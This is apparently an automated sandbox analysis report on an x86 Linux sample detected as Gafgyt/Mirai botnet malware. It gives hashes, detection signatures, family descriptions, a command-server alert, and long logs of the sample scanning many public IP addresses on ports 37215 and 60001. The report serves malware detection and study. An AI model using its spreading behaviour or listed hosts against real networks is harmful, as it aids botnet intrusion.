Linux Analysis Report
x86.elf

Overview

General Information

Sample name: x86.elf
Analysis ID: 1561770
MD5: d3194a1edfdb612594a2e16fec921089
SHA1: 2f56ec6ba4f3ee5f796f3c336c0bcadd19d6f970
SHA256: 73b2b6ec94ae260cfeca07d26370ab028f731c534265bb73414382598bd1975b
Tags: elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Machine Learning detection for sample
Opens /proc/net/* files useful for finding connected devices and routers
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample tries to kill a process (SIGKILL)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Bashlite, Gafgyt Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: x86.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: x86.elf ReversingLabs: Detection: 60%
Machine Learning detection for sample
Source: x86.elf Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2

Spreading
barindex
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/x86.elf (PID: 6226) Opens: /proc/net/route Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.23:52356 -> 188.132.232.158:5445
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 212.118.236.188 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.70.113.19 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.248.14.206 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.207.50.34 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.138.146.6 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.174.7.13 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 181.33.218.30 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.23.223.162 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.230.8.67 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.31.207.33 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.169.172.94 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.66.238.3 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.251.140.118 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.197.113.156 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.19.195.115 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.247.220.151 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 46.7.191.38 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.236.41.249 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.15.40.59 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.30.152.82 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.163.77.78 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.72.203.46 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.146.55.170 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.194.179.127 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.92.51.63 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.255.25.187 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.217.28.63 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.175.167.9 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 5.187.30.15 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.133.211.72 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.189.49.148 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.46.107.245 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.198.212.112 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.191.129.4 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.182.213.75 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.108.170.112 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.236.76.97 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.58.39.95 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 151.248.148.84 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.180.37.100 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.228.131.4 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 78.10.61.213 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.19.108.51 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.164.50.112 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.235.73.8 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 112.95.233.65 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.131.109.25 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.163.165.214 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.164.228.44 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.37.198.20 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.127.254.23 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.21.71.14 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.122.137.171 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 121.254.51.181 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.176.83.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 85.71.157.101 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.155.224.226 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.249.15.71 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.170.16.226 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.141.229.17 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.66.217.192 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 85.177.97.5 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.255.79.144 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.201.152.7 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.43.35.211 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 88.119.48.198 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.206.116.68 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.72.138.131 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.128.62.135 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 112.129.152.235 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.202.218.66 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.219.194.149 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.59.254.239 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.174.12.254 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.27.156.239 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.118.130.173 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 181.37.199.147 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.248.0.152 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.231.137.195 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.205.88.40 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.69.236.33 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.55.139.8 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.142.150.88 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.147.228.241 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.220.0.123 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.175.34.44 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.154.147.154 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.105.77.59 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 46.56.13.130 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 78.253.5.174 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.86.167.47 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.179.216.229 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.213.16.173 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.199.176.39 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.92.5.150 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.184.109.46 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.56.150.54 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.253.31.230 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.114.246.176 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.226.198.219 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.34.125.163 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.49.140.42 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.25.0.36 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.124.194.10 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.144.23.9 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.114.155.186 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.28.140.131 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 151.152.170.238 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 78.85.95.221 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 190.106.206.30 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.141.86.196 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.160.47.78 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.107.72.122 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.217.79.86 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.138.175.195 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.57.182.53 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.44.75.28 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.210.64.204 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 78.71.60.18 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 151.117.164.206 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 121.200.172.169 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.29.75.102 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.22.62.112 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.232.7.156 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.167.96.150 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 176.178.188.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 121.103.128.227 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.245.128.190 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.61.49.193 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.222.183.38 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.177.49.98 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 85.7.136.197 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.75.241.184 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 151.179.139.29 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.134.241.229 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 218.139.60.233 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.208.31.81 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.215.183.162 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 43.37.101.86 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.29.178.149 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.248.20.39 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 94.12.81.194 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.163.19.248 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 24.244.30.63 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.160.249.169 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 121.163.107.102 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 46.10.101.135 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 2.166.42.123 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 182.149.113.173 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.205.5.5 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 95.17.56.4 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.13.136.193 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.20.111.144 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 212.84.107.66 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 101.229.107.168 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 61.127.6.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 112.73.45.41 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 213.165.225.119 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 188.155.130.214 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 117.222.156.84 ports 1,2,3,5,7,37215
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.229.107.168:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.155.224.226:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.70.113.19:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.133.211.72:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.163.165.214:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.164.50.112:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.219.194.149:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 151.117.164.206:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.37.101.86:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.72.203.46:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.127.254.23:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.29.178.149:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 78.71.60.18:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.58.39.95:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 81.163.77.78:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.27.156.239:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 113.235.73.8:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.170.16.226:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.20.111.144:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.253.31.230:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 94.19.108.51:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 113.184.109.46:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.59.254.239:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 81.72.138.131:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.226.198.219:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.114.155.186:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 85.177.97.5:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.249.15.71:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 81.248.14.206:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.236.41.249:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.57.182.53:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 85.7.136.197:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 218.139.60.233:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.28.140.131:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.215.183.162:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.230.8.67:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.142.150.88:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.127.6.27:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 112.129.152.235:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.55.139.8:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.176.83.36:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 24.141.86.196:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.61.49.193:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 181.33.218.30:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.247.220.151:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 121.200.172.169:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.43.35.211:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.202.218.66:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 81.248.20.39:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 81.205.5.5:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.167.96.150:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.175.34.44:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.228.131.4:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.107.72.122:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 121.254.51.181:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 151.248.148.84:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 151.179.139.29:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.231.137.195:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.21.71.14:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.210.64.204:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.174.7.13:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.177.49.98:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.164.228.44:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 112.95.233.65:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.182.213.75:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 46.7.191.38:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 46.10.101.135:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 121.163.107.102:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.124.194.10:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.255.25.187:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.201.152.7:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.30.152.82:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.66.238.3:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.166.42.123:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 151.152.170.238:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.255.79.144:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 78.10.61.213:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.207.50.34:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.213.16.173:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.222.183.38:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.114.246.176:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.122.137.171:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 113.66.217.192:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.220.0.123:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.180.37.100:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.86.167.47:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 78.253.5.174:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.144.23.9:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.155.130.214:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.175.167.9:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 5.187.30.15:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.199.176.39:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.163.19.248:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 78.85.95.221:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 112.73.45.41:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 24.217.28.63:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.49.140.42:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 94.34.125.163:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.17.56.4:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.69.236.33:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 94.138.175.195:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.236.76.97:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.178.188.27:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.197.113.156:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.206.116.68:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.160.47.78:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.92.51.63:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.29.75.102:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 85.71.157.101:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.138.146.6:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 113.56.150.54:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.106.206.30:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.160.249.169:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 2.205.88.40:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.165.225.119:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.119.48.198:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.23.223.162:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.37.198.20:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 43.174.12.254:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 176.15.40.59:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.118.130.173:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 113.75.241.184:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.208.31.81:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.146.55.170:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.194.179.127:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 121.103.128.227:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 95.134.241.229:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.251.140.118:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.245.128.190:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 94.131.109.25:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.179.216.229:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.248.0.152:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.84.107.66:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 94.12.81.194:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.169.172.94:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 181.37.199.147:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 88.189.49.148:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.19.195.115:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 24.191.129.4:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.149.113.173:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.222.156.84:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 101.232.7.156:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 185.22.62.112:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.128.62.135:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.46.107.245:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.198.212.112:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 213.141.229.17:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 61.154.147.154:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 118.44.75.28:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.25.0.36:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.118.236.188:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 24.244.30.63:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 188.13.136.193:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.105.77.59:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.31.207.33:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 190.147.228.241:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 46.56.13.130:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 212.92.5.150:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 117.217.79.86:37215
Source: global traffic TCP traffic: 192.168.2.23:61354 -> 182.108.170.112:37215
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.21.178.149:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.208.13.148:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.114.103.95:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.164.50.112:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.69.19.72:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.10.137.44:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.109.230.222:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.25.162.226:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.49.205.14:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.96.214.181:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.157.94.203:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.150.49.24:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.63.19.59:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.191.156.148:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.226.27.243:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.219.86.174:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.69.174.153:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.207.52.254:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.20.3.90:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.44.185.205:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.233.205.83:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.95.212.43:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.116.105.199:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.153.25.14:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.235.145.127:60001
Source: global traffic TCP traffic: 192.168.2.23:61098 -> 81.104.32.214:60001
